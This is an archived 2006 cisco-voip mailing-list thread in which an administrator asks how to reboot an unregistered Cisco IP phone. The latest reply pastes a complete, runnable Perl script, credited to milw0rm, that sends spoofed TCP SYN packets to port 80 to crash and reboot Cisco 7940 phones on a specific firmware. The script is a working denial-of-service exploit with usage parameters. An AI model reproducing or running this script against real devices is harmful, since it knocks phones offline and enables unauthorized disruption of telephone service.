[cisco-voip] Remotely rebooting Phone without usingCallmanager(in
CM not connected, but can still ping/http)
Lelio Fulgenzi
lelio at uoguelph.ca
Fri Feb 17 19:59:06 EST 2006
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
----- Original Message -----
From: Lelio Fulgenzi
To: Kevin Thorngren ; Hans-Peter Walter
Cc: cisco-voip at puck.nether.net
Sent: Friday, February 17, 2006 7:53 PM
Subject: Re: [cisco-voip] Remotely rebooting Phone without usingCallmanager(in CM not connected, but can still ping/http)
aren't there a few exploits out there that cause a phone to reboot? ;)
----- Original Message -----
From: Kevin Thorngren
To: Hans-Peter Walter
Cc: cisco-voip at puck.nether.net
Sent: Friday, February 17, 2006 7:46 PM
Subject: Re: [cisco-voip] Remotely rebooting Phone without using Callmanager(in CM not connected, but can still ping/http)
Not sure of any other ideas at this point. Just curious if there is any Skinny traffic from the phone to CCM. Use Network Monitor on the Primary CCM to see if the phone is attempting to create a TCP connection to the CCM server and if it is failing.
Kevin
On Feb 17, 2006, at 7:38 PM, Hans-Peter Walter wrote:
hi,
we have a problem with a SRST-config at a remote site, so I played around and set a
line of a phone to "Auto Answer with speakerphone" and could hear some servers running in the background,
and did some testing. The SRST still doesn't work properly, but thats another story...
Now the phone some how stucks. I can ping it, I can go to the phone website http://<phone-ip>, but it
is *NOT* registered in Callmanager and not on the SRST-Router.
I denied access for that phone to the callmanager (hoped it would try to reboot) ==> no success
I rebooted the SRST-Router (default-gateway of the phone) ==> no success
I shut down and enabled the switch-port where the phone is connected ==> no success
I even rebooted the entire switch ;-) ==> no success
After all these actions I can still ping / http to the phone...
I wish I had PoE there, because I think I just would need unplug power....
soooo: Is there another way to reboot a phone *without* the Callmanager,
maybe something hidden like http://<phine-ip>/admin or something?
thanks and a nice weekend...
HP_______________________________________________
cisco-voip mailing list
cisco-voip at puck.nether.net
https://puck.nether.net/mailman/listinfo/cisco-voip
----------------------------------------------------------------------------
_______________________________________________
cisco-voip mailing list
cisco-voip at puck.nether.net
https://puck.nether.net/mailman/listinfo/cisco-voip
------------------------------------------------------------------------------
_______________________________________________
cisco-voip mailing list
cisco-voip at puck.nether.net
https://puck.nether.net/mailman/listinfo/cisco-voip
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://puck.nether.net/pipermail/cisco-voip/attachments/20060217/4d2b8716/attachment.html
More information about the cisco-voip
mailing list